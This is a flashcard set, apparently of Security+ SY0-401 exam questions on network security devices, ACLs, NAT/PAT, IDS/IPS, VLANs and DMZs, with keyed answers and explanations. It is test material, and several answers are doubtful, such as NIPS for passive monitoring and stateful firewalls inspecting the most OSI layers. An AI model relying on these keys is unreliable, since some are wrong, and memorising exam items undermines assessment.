Use LEFT and RIGHT arrow keys to navigate between flashcards;
Use UP and DOWN arrow keys to flip the card;
H to show hint;
A reads text to speech;
291 Cards in this Set
- Front
- Back
|
Sara, the security administrator, must configure the corporate firewall to allow all public IPaddresses on the internal interface of the firewall to be translated to one public IP address on the external interface of the same firewall. Which of the following should Sara configure? A. PAT B. NAP C. DNAT D. NAC |
Answer: A Explanation: Port Address Translation (PAT), is an extension to network address translation (NAT) that permitsmultiple devices on a local area network (LAN) to be mapped to a single public IP address. Thegoal of PAT is to conserve IP addresses.Most home networks use PAT. In such a scenario, the Internet Service Provider (ISP) assigns asingle IP address to the home network's router. When Computer X logs on the Internet, the routerassigns the client a port number, which is appended to the internal IP address. This, in effect,gives Computer X a unique address. If Computer Z logs on the Internet at the same time, therouter assigns it the same local IP address with a different port number. Although both computersare sharing the same public IP address and accessing the Internet at the same time, the routerknows exactly which computer to send specific packets to because each computer has a uniqueinternal address. |
|
|
Which of the following devices is MOST likely being used when processing the following?1 PERMIT IP ANY ANY EQ 802 DENY IP ANY ANY A. Firewall B. NIPS C. Load balancer D. URL filter |
Answer: A Explanation: Firewalls, routers, and even switches can use ACLs as a method of security management. Anaccess control list has a deny ip any any implicitly at the end of any access control list. ACLs deny by default and allow by exception |
|
|
The security administrator at ABC company received the following log information from an externalparty: 10:45:01 EST, SRC 10.4.3.7:3056, DST 8.4.2.1:80, ALERT, Directory traversal 10:45:02 EST, SRC 10.4.3.7:3057, DST 8.4.2.1:80, ALERT, Account brute force 10:45:03 EST, SRC 10.4.3.7:3058, DST 8.4.2.1:80, ALERT, Port scan The external party is reporting attacks coming from abc-company.com. Which of the following isthe reason the ABC company’s security administrator is unable to determine the origin of theattack? A. A NIDS was used in place of a NIPS. B. The log is not in UTC. C. The external party uses a firewall. D. ABC company uses PAT. |
Answer: D Explanation: PAT would ensure that computers on ABC’s LAN translate to the same IP address, but with adifferent port number assignment. The log information shows the IP address, not the port number,making it impossible to pin point the exact source. |
|
|
Which of the following security devices can be replicated on a Linux based computer using IP tables to inspect and properly handle network based traffic? A. Sniffer B. Router C. Firewall D. Switch |
Answer: C Explanation: Ip tables are a user-space application program that allows a system administrator to configure the tables provided by the Linux kernel firewall and the chains and rules it stores. |
|
|
Which of the following firewall types inspects Ethernet traffic at the MOST levels of the OSI model? A. Packet Filter Firewall B. Stateful Firewall C. Proxy Firewall D. Application Firewall |
Answer: B Explanation: Stateful inspections occur at all levels of the network. |
|
|
The Chief Information Security Officer (CISO) has mandated that all IT systems with credit card data be segregated from the main corporate network to prevent unauthorized access and that access to the IT systems should be logged. Which of the following would BEST meet the CISO’s requirements? A. Sniffers B. NIDS C. Firewalls D. Web proxies E. Layer 2 switches |
Answer:C Explanation: The basic purpose of a firewall is to isolate one network from another. |
|
|
Which of the following network design elements allows for many internal devices to share onepublic IP address? A. DNAT B. PAT C. DNS D. DMZ |
Answer: B Explanation: Port Address Translation (PAT), is an extension to network address translation (NAT) that permitsmultiple devices on a local area network (LAN) to be mapped to a single public IP address. Thegoal of PAT is to conserve IP addresses.Most home networks use PAT. In such a scenario, the Internet Service Provider (ISP) assigns asingle IP address to the home network's router. When Computer X logs on the Internet, the routerassigns the client a port number, which is appended to the internal IP address. This, in effect,gives Computer X a unique address. If Computer Z logs on the Internet at the same time, therouter assigns it the same local IP address with a different port number. Although both computersare sharing the same public IP address and accessing the Internet at the same time, the routerknows exactly which computer to send specific packets to because each computer has a uniqueinternal address. |
|
|
Which of the following is a best practice when securing a switch from physical access? A. Disable unnecessary accounts B. Print baseline configuration C. Enable access lists D. Disable unused ports |
Answer: D Explanation: Disabling unused switch ports a simple method many network administrators use to help securetheir network from unauthorized access.All ports not in use should be disabled. Otherwise, they present an open door for an attacker to enter. |
|
|
Which of the following devices would be MOST useful to ensure availability when there are a largenumber of requests to a certain website?A. Protocol analyzer
B. Load balancer C. VPN concentrator D. Web security gateway |
Answer: B Explanation: Load balancing refers to shifting a load from one device to another. A load balancer can beimplemented as a software or hardware solution, and it is usually associated with a device—arouter, a firewall, NAT appliance, and so on. In its most common implementation, a load balancersplits the traffic intended for a website into individual requests that are then rotated to redundantservers as they become available. |
|
|
Pete, the system administrator, wishes to monitor and limit users’ access to external websites.Which of the following would BEST address this? A. Block all traffic on port 80. B. Implement NIDS. C. Use server load balancers. D. Install a proxy server. |
Answer: D Explanation: A proxy is a device that acts on behalf of other(s). In the interest of security, all internal userinteraction with the Internet should be controlled through a proxy server. The proxy server shouldautomatically block known malicious sites. The proxy server should cache often-accessed sites toimprove performance.CompTIA SY0-401 Exam" |
|
|
Mike, a network administrator, has been asked to passively monitor network traffic to the company’s sales websites. Which of the following would be BEST suited for this task? A. HIDS B. Firewall C. NIPS D. Spam filter |
Answer: C Explanation: Network-based intrusion prevention system (NIPS) monitors the entire network for suspicioustraffic by analyzing protocol activity. |
|
|
Which of the following should be deployed to prevent the transmission of malicious traffic betweenvirtual machines hosted on a singular physical device on a network? A. HIPS on each virtual machine B. NIPS on the network C. NIDS on the network D. HIDS on each virtual machine |
Answer: A Explanation: Host-based intrusion prevention system (HIPS) is an installed software package which monitors asingle host for suspicious activity by analyzing events occurring within that host. |
|
|
Pete, a security administrator, has observed repeated attempts to break into the network. Which ofthe following is designed to stop an intrusion on the network? A. NIPS B. HIDS C. HIPS D. NIDS |
Answer: A Explanation: Network-based intrusion prevention system (NIPS) monitors the entire network for suspicioustraffic by analyzing protocol activity. The main functions of intrusion prevention systems are toidentify malicious activity, log information about this activity, attempt to block/stop it, and report it |
|
|
An administrator is looking to implement a security device which will be able to not only detectnetwork intrusions at the organization level, but help defend against them as well. Which of thefollowing is being described here? A. NIDS B. NIPS C. HIPS D. HIDS |
Answer: B Explanation: Network-based intrusion prevention system (NIPS) monitors the entire network for suspicioustraffic by analyzing protocol activity. The main functions of intrusion prevention systems are toidentify malicious activity, log information about this activity, attempt to block/stop it, and report it |
|
|
In intrusion detection system vernacular, which account is responsible for setting the security policy for an organization? A. Supervisor B. Administrator C. Root D. Director |
Answer: B Explanation: The administrator is the person responsible for setting the security policy for an organization and isresponsible for making decisions about the deployment and configuration of the IDS. |
|
|
When performing the daily review of the system vulnerability scans of the network Joe, the administrator, noticed several security related vulnerabilities with an assigned vulnerabilityidentification number. Joe researches the assigned vulnerability identification number from the vendor website. Joe proceeds with applying the recommended solution for identified vulnerability.Which of the following is the type of vulnerability described? A. Network based B. IDS C. Signature based D. Host based |
Answer: C Explanation: A signature-based monitoring or detection method relies on a database of signatures or patterns of known malicious or unwanted activity. The strength of a signature-based system is that it can quickly and accurately detect any event from its database of signatures. |
|
|
The network security engineer just deployed an IDS on the network, but the Chief TechnicalOfficer (CTO) has concerns that the device is only able to detect known anomalies. Which of thefollowing types of IDS has been deployed? A. Signature Based IDS B. Heuristic IDS C. Behavior Based IDS D. Anomaly Based IDS |
Answer: A Explanation: A signature based IDS will monitor packets on the network and compare them against a databaseof signatures or attributes from known malicious threats. |
|
|
Joe, the Chief Technical Officer (CTO), is concerned about new malware being introduced into thecorporate network. He has tasked the security engineers to implement a technology that is capable of alerting the team when unusual traffic is on the network. Which of the following types oftechnologies will BEST address this scenario? A. Application FirewallB. Anomaly Based IDSC. Proxy FirewallD. Signature IDS |
Answer: BExplanation: Anomaly-based detection watches the ongoing activity in the environment and looks for abnormaloccurrences. An anomaly-based monitoring or detection method relies on definitions of all validforms of activity. This database of known valid activity allows the tool to detect any and allanomalies. Anomaly-based detection is commonly used for protocols. Because all the valid andlegal forms of a protocol are known and can be defined, any variations from those known validconstructions are seen as anomalies.
|
|
|
Matt, an administrator, notices a flood fragmented packet and retransmits from an email server.After disabling the TCP offload setting on the NIC, Matt sees normal traffic with packets flowing insequence again. Which of the following utilities was he MOST likely using to view this issue?
A. Spam filter B. Protocol analyzer C. Web application firewall D. Load balancer |
Answer: B Explanation: A protocol analyzer is a tool used to examine the contents of network traffic. Commonly known asa sniffer, a protocol analyzer can be a dedicated hardware device or software installed onto atypical host system. In either case, a protocol analyzer is first a packet capturing tool that cancollect network traffic and store it in memory or onto a storage device. Once a packet is captured,it can be analyzed either with complex automated tools and scripts or manually. |
|
|
Which the following flags are used to establish a TCP connection? (Select TWO). A. PSH B. ACK C. SYN D. URGE. FIN |
Answer: B,C Explanation: To establish a TCP connection, the three-way (or 3-step) handshake occurs:SYN: The active open is performed by the client sending a SYN to the server. The client sets thesegment's sequence number to a random value A.SYN-ACK: In response, the server replies with a SYN-ACK. The acknowledgment number is set toone more than the received sequence number i.e. A+1, and the sequence number that the serverchooses for the packet is another random number, B.ACK: Finally, the client sends an ACK back to the server. The sequence number is set to thereceived acknowledgement value i.e. A+1, and the acknowledgement number is set to one morethan the received sequence number i.e. B+1. |
|
|
Which of the following components of an all-in-one security appliance would MOST likely beconfigured in order to restrict access to peer-to-peer file sharing websites? A. Spam filter B. URL filter C. Content inspection D. Malware inspection |
Answer: B Explanation: The question asks how to prevent access to peer-to-peer file sharing websites. You access awebsite by browsing to a URL using a Web browser or peer-to-peer file sharing client software. AURL filter is used to block URLs (websites) to prevent users accessing the website.Incorrect Answer:A: A spam filter is used for email. All inbound (and sometimes outbound) email is passed throughthe spam filter to detect spam emails. The spam emails are then discarded or tagged as potentialspam according to the spam filter configuration. Spam filters do not prevent users accessing peerto-peer file sharing websites.C: Content inspection is the process of inspecting the content of a web page as it is downloaded. The content can then be blocked if it doesn’t comply with the company’s web policy. Contentcontrol software determines what content will be available or perhaps more often what content willbe blocked. Content inspection does not prevent users accessing peer-to-peer file sharingwebsites (although it could block the content of the sites as it is downloaded).D: Malware inspection is the process of scanning a computer system for malware. Malwareinspection does not prevent users accessing peer-to-peer file sharing websites. |
|
|
Pete, the system administrator, wants to restrict access to advertisements, games, and gamblingweb sites. Which of the following devices would BEST achieve this goal? A. Firewall B. Switch C. URL content filter D. Spam filter |
Answer: C Explanation: URL filtering, also known as web filtering, is the act of blocking access to a site based on all orpart of the URL used to request access. URL filtering can focus on all or part of a fully qualifieddomain name (FQDN), specific path names, specific filenames, specific fi le extensions, or entirespecific URLs. Many URL-filtering tools can obtain updated master URL block lists from vendorsas well as allow administrators to add or remove URLs from a custom list. |
|
|
The administrator receives a call from an employee named Joe. Joe says the Internet is down andhe is receiving a blank page when typing to connect to a popular sports website. The administratorasks Joe to try visiting a popular search engine site, which Joe reports as successful. Joe thensays that he can get to the sports site on this phone. Which of the following might the administratorneed to configure? A. The access rules on the IDS B. The pop up blocker in the employee’s browser C. The sensitivity level of the spam filter D. The default block page on the URL filter |
Answer: D Explanation: A URL filter is used to block access to a site based on all or part of a URL. There are a number ofURL-filtering tools that can acquire updated master URL block lists from vendors, as well as allowadministrators to add or remove URLs from a custom list. |
|
|
Layer 7 devices used to prevent specific types of html tags are called: A. Firewalls B. Content filters C. Routers D. NIDS |
Answer: B Explanation: A content filter is a is a type of software designed to restrict or control the content a reader isauthorised to access, particularly when used to limit material delivered over the Internet via theWeb, e-mail, or other means. Because the user and the OSI layer interact directly with the contentfilter, it operates at Layer 7 of the OSI model. |
|
|
Pete, an employee, attempts to visit a popular social networking site but is blocked. Instead, apage is displayed notifying him that this site cannot be visited. Which of the following is MOSTlikely blocking Pete’s access to this site? A. Internet content filter B. Firewall C. Proxy server D. Protocol analyzer |
Answer: A Explanation: Web filtering software is designed to restrict or control the content a reader is authorised to access, especially when utilised to restrict material delivered over the Internet via the Web, e-mail,or other means. |
|
|
A review of the company’s network traffic shows that most of the malware infections are caused byusers visiting gambling and gaming websites. The security manager wants to implement a solutionthat will block these websites, scan all web traffic for signs of malware, and block the malwarebefore it enters the company network. Which of the following is suited for this purpose?
A. ACL B. IDS C. UTM D. Firewall |
Answer: C Explanation: An all-in-one appliance, also known as Unified Threat Management (UTM) and Next GenerationFirewall (NGFW), is one that provides a good foundation for security. A variety is available; thosethat you should be familiar with for the exam fall under the categories of providing URL filtering,content inspection, or malware inspection.Malware inspection is the use of a malware scanner to detect unwanted software content innetwork traffic. If malware is detected, it can be blocked or logged and/or trigger an alert. |
|
|
Which of the following is BEST at blocking attacks and providing security at layer 7 of the OSImodel?
A. WAF B. NIDS C. Routers D. Switches |
Answer: A Explanation: A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rulesto an HTTP conversation. Generally, these rules cover common attacks such as cross-site scripting (XSS) and SQL injection. By customizing the rules to your application, many attacks canbe identified and blocked. The effort to perform this customization can be significant and needs tobe maintained as the application is modified.As the protocols used to access a web server (typically HTTP and HTTPS) run in layer 7 of theOSI model, then web application firewall (WAF) is the correct answer. |
|
|
Which of the following should the security administrator implement to limit web traffic based oncountry of origin? (Select THREE). A. Spam filter B. Load balancer C. Antivirus D. Proxies E. Firewall F. NIDS G. URL filtering |
Answer: D,E,G Explanation: A proxy server is a server that acts as an intermediary for requests from clients seeking resourcesfrom other servers.Firewalls manage traffic using a rule or a set of rules.A URL is a reference to a resource that specifies the location of the resource. A URL filter is usedto block access to a site based on all or part of a URL. |
|
|
A security engineer is reviewing log data and sees the output below: POST: /payload.php HTTP/1.1 HOST: localhost Accept: */* Referrer: http://localhost/ ******* HTTP/1.1 403 Forbidden Connection: close Log: Access denied with 403. Pattern matches form bypass Which of the following technologieswas MOST likely being used to generate this log? A. Host-based Intrusion Detection System B. Web application firewall C. Network-based Intrusion Detection SystemD. Stateful Inspection Firewall E. URL Content Filter |
Answer: B Explanation: A web application firewall is a device, server add-on, virtual service, or system filter that defines astrict set of communication rules for a website and all visitors. It’s intended to be an applicationspecific firewall to prevent cross-site scripting, SQL injection, and other web application attacks |
|
|
An administrator would like to review the effectiveness of existing security in the enterprise. Which of the following would be the BEST place to start? A. Review past security incidents and their resolution B. Rewrite the existing security policy C. Implement an intrusion prevention system D. Install honey pot systems |
Answer: C Explanation: The main functions of intrusion prevention systems are to identify malicious activity, log information about this activity, attempt to block/stop it, and report it |
|
|
A company has proprietary mission critical devices connected to their network which areconfigured remotely by both employees and approved customers. The administrator wants tomonitor device security without changing their baseline configuration. Which of the followingshould be implemented to secure the devices without risking availability? A. Host-based firewall B. IDS C. IPS D. Honeypot |
Answer: B Explanation: An intrusion detection system (IDS) is a device or software application that monitors network orsystem activities for malicious activities or policy violations and produces reports to a managementstation. IDS come in a variety of “flavors” and approach the goal of detecting suspicious traffic indifferent ways. There are network based (NIDS) and host based (HIDS) intrusion detectionsystems. Some systems may attempt to stop an intrusion attempt but this is neither required norexpected of a monitoring system. Intrusion detection and prevention systems (IDPS) are primarilyfocused on identifying possible incidents, logging information about them, and reporting attempts.In addition, organizations use IDPSes for other purposes, such as identifying problems withsecurity policies, documenting existing threats and deterring individuals from violating securitypolicies. IDPSes have become a necessary addition to the security infrastructure of nearly everyorganization.IDPSes typically record information related to observed events, notify security administrators ofimportant observed events and produce reports. Many IDPSes can also respond to a detectedthreat by attempting to prevent it from succeeding. They use several response techniques, whichinvolve the IDPS stopping the attack itself, changing the security environment (e.g. reconfiguring afirewall) or changing the attack's content.QUESTION NO: 32 CORREC |
|
|
Which of the following firewall rules only denies DNS zone transfers? A. deny udp any any port 53 B. deny ip any any C. deny tcp any any port 53 D. deny all dns packets |
Answer: C Explanation: DNS operates over TCP and UDP port 53. TCP port 53 is used for zone transfers. |
|
|
A security administrator suspects that an increase in the amount of TFTP traffic on the network isdue to unauthorized file transfers, and wants to configure a firewall to block all TFTP traffic.Which of the following would accomplish this task?A. Deny TCP port 68B. Deny TCP port 69C. Deny UDP port 68D. Deny UDP port 69 |
Answer: DExplanation: Trivial File Transfer Protocol (TFTP) is a simple file-exchange protocol that doesn’t require authentication. It operates on UDP port 69. |
|
|
Sara, a security technician, has received notice that a vendor coming in for a presentation willrequire access to a server outside of the network. Currently, users are only able to access remotesites through a VPN connection. How could Sara BEST accommodate the vendor? A. Allow incoming IPSec traffic into the vendor’s IP address. B. Set up a VPN account for the vendor, allowing access to the remote site. C. Turn off the firewall while the vendor is in the office, allowing access to the remote site. D. Write a firewall rule to allow the vendor to have access to the remote site. |
Answer: D Explanation: Firewall rules are used to define what traffic is able pass between the firewall and the internalnetwork. Firewall rules block the connection, allow the connection, or allow the connection only if itis secured. Firewall rules can be applied to inbound traffic or outbound traffic and any type ofnetwork. |
|
|
A technician is deploying virtual machines for multiple customers on a single physical host to reduce power consumption in a data center. Which of the following should be recommended to isolate the VMs from one another? A. Implement a virtual firewall B. Install HIPS on each VM C. Virtual switches with VLANs D. Develop a patch management guide |
Answer: C Explanation: A virtual local area network (VLAN) is a hardware-imposed network segmentation created byswitches. VLANs are used for traffic management. VLANs can be used to isolate traffic betweennetwork segments. |
|
|
A router has a single Ethernet connection to a switch. In the router configuration, the Ethernetinterface has three sub-interfaces, each configured with ACLs applied to them and 802.1q trunks.Which of the following is MOST likely the reason for the sub-interfaces? A. The network uses the subnet of 255.255.255.128. B. The switch has several VLANs configured on it. C. The sub-interfaces are configured for VoIP traffic. D. The sub-interfaces each implement quality of service. |
Answer: B Explanation: A subinterface is a division of one physical interface into multiple logical interfaces. Routerscommonly employ subinterfaces for a variety of purposes, most common of these are for routingtraffic between VLANs. Also, IEEE 802.1Q is the networking standard that supports virtual LANs(VLANs) on an Ethernet network. |
|
|
Joe, a technician at the local power plant, notices that several turbines had ramp up in cyclesduring the week. Further investigation by the system engineering team determined that a timed.exe file had been uploaded to the system control console during a visit by internationalcontractors. Which of the following actions should Joe recommend? A. Create a VLAN for the SCADA B. Enable PKI for the MainFrame C. Implement patch management D. Implement stronger WPA2 Wireless |
Answer: A Explanation: VLANs are used for traffic management. VLANs can be used to isolate traffic between networksegments. This can be accomplished by not defining a route between different VLANs or byspecifying a deny filter between certain VLANs (or certain members of a VLAN). Any networksegment that doesn’t need to communicate with another in order to accomplish a worktask/function shouldn’t be able to do so. |
|
|
The security administrator needs to manage traffic on a layer 3 device to support FTP from a newremote site. Which of the following would need to be implemented? A. Implicit deny B. VLAN management C. Port security D. Access control lists |
Answer: D Explanation: In the OSI model, IP addressing and IP routing are performed at layer 3 (the network layer). In thisquestion we need to configure routing. When configuring routing, you specify which IP range (inthis case, the IP subnet of the remote site) is allowed to route traffic through the router to the FTPserver. Traffic that comes into the router is compared to ACL entries based on the order that the entriesoccur in the router. New statements are added to the end of the list. The router continues to lookuntil it has a match. If no matches are found when the router reaches the end of the list, the trafficis denied. For this reason, you should have the frequently hit entries at the top of the list. There isan implied deny for traffic that is not permitted. |
|
|
Matt, the network engineer, has been tasked with separating network traffic between virtualmachines on a single hypervisor. Which of the following would he implement to BEST address thisrequirement? (Select TWO). A. Virtual switch B. NAT C. System partitioning D. Access-list E. Disable spanning tree F. VLAN |
Answer: A,F Explanation: A virtual local area network (VLAN) is a hardware-imposed network segmentation created byswitches. A virtual switch is a software application that allows communication between virtualmachines. A combination of the two would best satisfy the question. |
|
|
A database administrator contacts a security administrator to request firewall changes for a connection to a new internal application. The security administrator notices that the new application uses a port typically monopolized by a virus. The security administrator denies the request and suggests a new port or service be used to complete the application’s task. Which of the following is the security administrator practicing in this example? A. Explicit deny B. Port security C. Access control lists D. Implicit deny |
Answer: C Explanation: Traffic that comes into the router is compared to ACL entries based on the order that the entries occur in the router. New statements are added to the end of the list. The router continues to look until it has a match. If no matches are found when the router reaches the end of the list, the traffic is denied. For this reason, you should have the frequently hit entries at the top of the list. There is an implied deny for traffic that is not permitted. |
|
|
An administrator needs to connect a router in one building to a router in another using Ethernet. Each router is connected to a managed switch and the switches are connected to each other via a fiber line. Which of the following should be configured to prevent unauthorized devices from connecting to the network?
A. Configure each port on the switches to use the same VLAN other than the default one B. Enable VTP on both switches and set to the same domain C. Configure only one of the routers to run DHCP services D. Implement port security on the switches |
Answer: D Explanation: Port security in IT can mean several things:The physical control of all connection points, such as RJ-45 wall jacks or device ports, so that no unauthorized users or unauthorized devices can attempt to connect into an open port.The management of TCP and User Datagram Protocol (UDP) ports. If a service is active and assigned to a port, then that port is open. All the other 65,535 ports (of TCP or UDP) are closed if a service isn’t actively using them. Port knocking is a security system in which all ports on a system appear closed. However, if the client sends packets to a specific set of ports in a certain order, a bit like a secret knock, then the desired service port becomes open and allows the client software to connect to the service. |
|
|
At an organization, unauthorized users have been accessing network resources via unused network wall jacks. Which of the following would be used to stop unauthorized access? A. Configure an access list. B. Configure spanning tree protocol. C. Configure port security. D. Configure loop protection |
Answer: C Explanation: Port security in IT can mean several things. It can mean the physical control of all connection points, such as RJ-45 wall jacks or device ports, so that no unauthorized users or unauthorized devices can attempt to connect into an open port. This can be accomplished by locking down the wiring closet and server vaults and then disconnecting the workstation run from the patch panel (or punch-down block) that leads to a room’s wall jack. Any unneeded or unused wall jacks can (and should) be physically disabled in this manner. Another option is to use a smart patch panel that can monitor the MAC address of any device connected to each and every wall port across a building and detect not just when a new device is connected to an empty port, but also when a valid device is disconnected or replaced by an invalid device. |
|
|
On Monday, all company employees report being unable to connect to the corporate wirelessnetwork, w hich uses 802.1x with PEAP. A technician verifies that no configuration changes were made to the wireless network and its supporting infrastructure, and that there are no outages. Which of the following is the MOST likely cause for this issue? A. Too many incorrect authentication attempts have caused users to be temporarily disabled. B. The DNS server is overwhelmed with connections and is unable to respond to queries. C. The company IDS detected a wireless attack and disabled the wireless network. D. The Remote Authentication Dial-In User Service server certificate has expired. |
Answer: D Explanation: The question states that the network uses 802.1x with PEAP. The 802.1x authentication server istypically an EAP-compliant Remote Access Dial-In User Service (RADIUS). A RADIUS server willbe configured with a digital certificate. When a digital certificate is created, an expiration period isconfigured by the Certificate Authority (CA). The expiration period is commonly one or two years.The question states that no configuration changes have been made so it’s likely that the certificatehas expired. |
|
|
A company determines a need for additional protection from rogue devices plugging into physical ports around the building. Which of the following provides the highest degree of protection from unauthorized wired network access? A. Intrusion Prevention Systems B. MAC filtering C. Flood guards D. 802.1x |
Answer: D Explanation: IEEE 802.1x is an IEEE Standard for Port-based Network Access Control (PNAC). It is part of the IEEE 802.1 group of networking protocols and provides an authentication mechanism to wireless devices connecting to a LAN or WLAN. |
|
|
While configuring a new access layer switch, the administrator, Joe, was advised that he needed to make sure that only devices authorized to access the network would be permitted to login and utilize resources. Which of the following should the administrator implement to ensure thishappens? A. Log Analysis B. VLAN Management C. Network separation D. 802.1x |
Answer: D Explanation: 802.1x is a port-based authentication mechanism. It’s based on Extensible Authentication Protocol(EAP) and is commonly used in closed-environment wireless networks. 802.1x was initially used to compensate for the weaknesses of Wired Equivalent Privacy (WEP), but today it’s often used as a component in more complex authentication and connection-management systems, including Remote Authentication Dial-In User Service (RADIUS), Diameter, Cisco System’s Terminal Access Controller Access-Control System Plus (TACACS+), and Network Access Control (NAC) |
|
|
A network administrator wants to block both DNS requests and zone transfers coming fromoutside IP addresses. The company uses a firewall which implements an implicit allow and iscurrently configured with the following ACL applied to its external interface. PERMIT TCP ANY ANY 80 PERMIT TCP ANY ANY 443Which of the following rules would accomplish this task? (Select TWO). A. Change the firewall default settings so that it implements an implicit deny B. Apply the current ACL to all interfaces of the firewall C. Remove the current ACL D. Add the following ACL at the top of the current ACLDENY TCP ANY ANY 53 E. Add the following ACL at the bottom of the current ACLDENY ICMP ANY ANY 53 F. Add the following ACL at the bottom of the current ACLDENY IP ANY ANY 53 |
Answer: A,F Explanation: Implicit deny is the default security stance that says if you aren’t specifically granted access orprivileges for a resource, you’re denied access by default. Implicit deny is the default responsewhen an explicit allow or deny isn’t present.DNS operates over TCP and UDP port 53. TCP port 53 is used for zone transfers. These are zonefile exchanges between DNS servers, special manual queries, or used when a response exceeds512 bytes. UDP port 53 is used for most typical DNS queries. |
|
|
Users are unable to connect to the web server at IP 192.168.0.20. Which of the following can beinferred of a firewall that is configured ONLY with the following ACL? PERMIT TCP ANY HOST 192.168.0.10 EQ 80PERMIT TCP ANY HOST 192.168.0.10 EQ 443 A. It implements stateful packet filtering. B. It implements bottom-up processing. C. It failed closed. D. It implements an implicit deny. |
Answer: D Explanation: Implicit deny is the default security stance that says if you aren’t specifically granted access or privileges for a resource, you’re denied access by default. Implicit deny is the default response when an explicit allow or deny isn’t present. |
|
|
The Human Resources department has a parent shared folder setup on the server. There are twogroups that have access, one called managers and one called staff. There are many sub foldersunder the parent shared folder, one is called payroll. The parent folder access control listpropagates all subfolders and all subfolders inherit the parent permission. Which of the following isthe quickest way to prevent the staff group from gaining access to the payroll folder? A. Remove the staff group from the payroll folder B. Implicit deny on the payroll folder for the staff group C. Implicit deny on the payroll folder for the managers group D. Remove inheritance from the payroll folder |
Answer: B Explanation: Implicit deny is the default security stance that says if you aren’t specifically grantedaccess or privileges for a resource, you’re denied access by default. |
|
|
A company has several conference rooms with wired network jacks that are used by both employees and guests. Employees need access to internal resources and guests only need access to the Internet. Which of the following combinations is BEST to meet the requirements? A. NAT and DMZ B. VPN and IPSec C. Switches and a firewall D. 802.1x and VLANs |
Answer: D Explanation: 802.1x is a port-based authentication mechanism. It’s based on Extensible Authentication Protocol (EAP) and is commonly used in closed-environment wireless networks. 802.1x was initially used to compensate for the weaknesses of Wired Equivalent Privacy (WEP), but today it’soften used as a component in more complex authentication and connection-management systems, including Remote Authentication Dial-In User Service (RADIUS), Diameter, Cisco System’s Terminal Access Controller Access-Control System Plus (TACACS+), and Network Access Control (NAC).A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches. By default, all ports on a switch are part of VLAN 1. But as the switch administrator changes the VLAN assignment on a port-by-port basis, various ports can be grouped together and be distinct from other VLAN port designations. VLANs are used for traffic management.Communications between ports within the same VLAN occur without hindrance, but communications between VLANs require a routing function. |
|
|
Matt, the IT Manager, wants to create a new network available to virtual servers on the same hypervisor, and does not want this network to be routable to the firewall. How could this BEST be accomplished? A. Create a VLAN without a default gateway. B. Remove the network from the routing table. C. Create a virtual switch. D. Commission a stand-alone switch |
Answer: C Explanation: A Hyper-V Virtual Switch implements policy enforcement for security, isolation, and service levels. |
|
|
A Chief Information Security Officer (CISO) is tasked with outsourcing the analysis of security logs.These will need to still be reviewed on a regular basis to ensure the security of the company has not been breached. Which of the following cloud service options would support this requirement? A. SaaS B. MaaS C. IaaS D. PaaS |
Answer: B Explanation: Monitoring-as-a-service (MaaS) is a cloud delivery model that falls under anything as a service(XaaS). MaaS allows for the deployment of monitoring functionalities for several other services and applications within the cloud. |
|
|
Joe, a security administrator, believes that a network breach has occurred in the data center as a result of a misconfigured router access list, allowing outside access to an SSH server. Which of the following should Joe search for in the log files? A. Failed authentication attempts B. Network ping sweeps C. Host port scans D. Connections to port 22 |
Answer: D Explanation: Log analysis is the art and science of reviewing audit trails, log files, or other forms of computer generated records for evidence of policy violations, malicious events, downtimes, bottlenecks, or other issues of concern.SSH uses TCP port 22. All protocols encrypted by SSH also use TCP port 22, such as SFTP,SHTTP, SCP, SExec, and slogin. |
|
|
An organization does not have adequate resources to administer its large infrastructure. A security administrator wishes to combine the security controls of some of the network devices in the organization. Which of the following methods would BEST accomplish this goal? A. Unified Threat Management B. Virtual Private Network C. Single sign on D. Role-based management |
Answer: A Explanation: When you combine a firewall with other abilities (intrusion prevention, antivirus, content filtering,etc.), what used to be called an all-in-one appliance is now known as a unified threat management(UTM) system. The advantages of combining everything into one include a reduced learning curve(you only have one product to learn), a single vendor to deal with, and—typically—reduced complexity. |
|
|
An organization does not have adequate resources to administer its large infrastructure. A securityadministrator wishes to integrate the security controls of some of the network devices in theorganization. Which of the following methods would BEST accomplish this goal? A. Unified Threat Management B. Virtual Private Network C. Single sign on D. Role-based management |
Answer: A Explanation: Unified Threat Management (UTM) is, basically, the combination of a firewall with other abilities.These abilities include intrusion prevention, antivirus, content filtering, etc. Advantages of combining everything into one:You only have one product to learn.You only have to deal with a single vendor.IT provides reduced complexity |
|
|
A security administrator is segregating all web-facing server traffic from the internal network and restricting it to a single interface on a firewall. Which of the following BEST describes this newnetwork? A. VLAN B. Subnet C. VPN D. DMZ |
Answer: D Explanation: A DMZ or demilitarized zone (sometimes referred to as a perimeter network) is a physical or logical subnetwork that contains and exposes an organization's external-facing services to a larger and untrusted network, usually the Internet. The purpose of a DMZ is to add an additional layer of security to an organization's local area network (LAN); an external network node only has direct access to equipment in the DMZ, rather than any other part of the network. The name is derived from the term "demilitarized zone", an area between nation states in which military operation is not permitted. |
|
|
Which of the following devices would MOST likely have a DMZ interface? A. Firewall B. Switch C. Load balancer D. Proxy |
Answer: A Explanation: The DMZ is a buffer network between the public untrusted Internet and the private trusted LAN. Often a DMZ is deployed through the use of a multihomed firewall. |
|
|
A security analyst needs to ensure all external traffic is able to access the company’s front-endservers but protect all access to internal resources. Which of the following network design elements would MOST likely be recommended? A. DMZ B. Cloud computing C. VLAN D. Virtualization |
Answer: A Explanation: A demilitarized zone (DMZ) is an area of a network that is designed specifically for public users to access. The DMZ is a buffer network between the public untrusted Internet and the private trusted LAN. Often a DMZ is deployed through the use of a multihomed firewall. |
|
|
Which of the following network architecture concepts is used to securely isolate at the boundary between networks? A. VLAN B. Subnetting C. DMZ D. NAT |
Answer: C Explanation: A demilitarized zone (DMZ) is an area of a network that is designed specifically for public users to access. The DMZ is a buffer network between the public untrusted Internet and the private trusted LAN. Often a DMZ is deployed through the use of a multihomed firewall. |
|
|
When designing a new network infrastructure, a security administrator requests that the intranet web server be placed in an isolated area of the network for security purposes. Which of the following design elements would be implemented to comply with the security administrator’s request? A. DMZ B. Cloud services C. Virtualization D. Sandboxing |
Answer: A Explanation: A demilitarized zone (DMZ) is an area of a network that is designed specifically for public users to access. The DMZ is a buffer network between the public untrusted Internet and the private trusted LAN. Often a DMZ is deployed through the use of a multihomed firewall. |
|
|
Which of the following BEST describes a demilitarized zone? A. A buffer zone between protected and unprotected networks. B. A network where all servers exist and are monitored. C. A sterile, isolated network segment with access lists. D. A private network that is protected by a firewall and a VLAN. |
